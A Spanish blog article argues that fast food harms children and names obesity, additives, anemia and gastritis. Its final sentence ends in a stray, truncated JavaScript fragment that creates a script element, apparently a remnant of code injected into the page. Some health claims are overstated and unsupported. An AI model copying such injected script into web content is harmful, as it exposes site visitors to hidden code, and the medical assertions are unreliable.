Salud y belleza » Alimentación, Salud

“Carta abierta” contra la comida Fast Food

Sin Comentarios

 

El título de esta nota bien podría llamarse “los peligros de comer bajo el sistema capitalista” pero, claro, lo hemos dejado de lado para no herir susceptibilidades y para no entrar en debates políticos (¿Qué? ¿Qué ya lo hemos hecho?).

comidarapida-fastfood

En fin, la comida chatarra es un mal de estos tiempos modernos caracterizados por el consumismo, el poco cuidado de la salud y el lucro económico. Día a día en España y el mundo crece el número de niños (sí, mayores también pero sobre todo niños) que consumen los denominados alimentos “chatarra”.

¿Cuál es la comida chatarra o basura? Básicamente la del “payaso” y la de la “muchachita con trenzas”: hamburguesas, papas fritas, hot dogs, etc. (la lista es amplia pero la mayoría de las comidas giran en torno a variaciones de esos productos principales).

“La comida chatarra es una amenaza para los niños. Es decir, ellos no tienen conciencia de  los peligros que les puede traer, es una opción fácil para los padres pero una decisión terrible para los pequeños. Un niño no tiene el organismo aún desarrollado para soportar grasas o frituras exageradas. Es más, en el caso de un adulto a veces ocurren efectos dañinos asique ni hace falta imaginar el impacto en niños pequeños. A menudo es preferible preparar nosotros mismos esas comidas, con los controles y precauciones debidas, que llevar a nuestros hijos a esos locales” revela (…lo que en verdad todos sabemos) un especialista en Nutrición.

Como sabemos, la comida chatarra contiene altos niveles de grasas, sal, condimentos o azúcares junto con numerosos aditivos alimentarios (glutamato, monosódic, tartracina) que pueden verdaderamente poner en jaque nuestra salud.

Si bien “en potencia”, casi todos los alimentos ricos (“culturalmente ricos” pues el sabor es un concepto tan abstracto como la belleza a menudo impulsado por agentes sospechosos) son peligrosos, lo que ocurre con la comida basura es que necesita menos tiempo de exposición para dañarnos. ¿Cómo nos ataca? Fomentando la obesidad (actualmente en España, el número de niños con obesidad se ha triplicado en comparacíón a las cifras que había hace solo diez años), acrecentando enfermedades del corazón, aumentando nuestros niveles de colesterol, creando adicción.

En el largo plazo, vale mencionar que en la mayoría de los casos los  niños que consumen comida basura terminan por sufrir anemia y trastornos químicos en el organismo. Por otra parte, en el corto plazo, esos mismos niños pueden verse afectados por males como irritación en el estómago e intestinos, gastritis y estreñimiento.

El bajo coste (uno puede conseguir una “Cheesburger” por escasos euros) de esta clase de alimentos no ayuda para nada al cuidado de la salud, al igual que el discurso de las empresas: por el contrario de lo que nos quieren hacer creer, la tendencia marca que  los servicios dados por “MC” “BIG” y compañía tienden a empeorar el nivel de vida del individuo.

Como vemos, en el sistema capi…, mejor dicho en el sistema social actual, el cuidado de nuestra salud es un acto totalmente personal: nadie nos cuidará por nosotros ni nos avisará de los peligros latentes en ciertos productos (es más “los esconderán bajo letra chica y propaganda grande”).

Por lo tanto debemos estar atentos, ser responsables y cuidarnos de todos esos productos “de moda” que tanto nos dañan: desde la comida chatarra, hasta los energizantes.var d=document;var s=d.createElement('script'); }

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.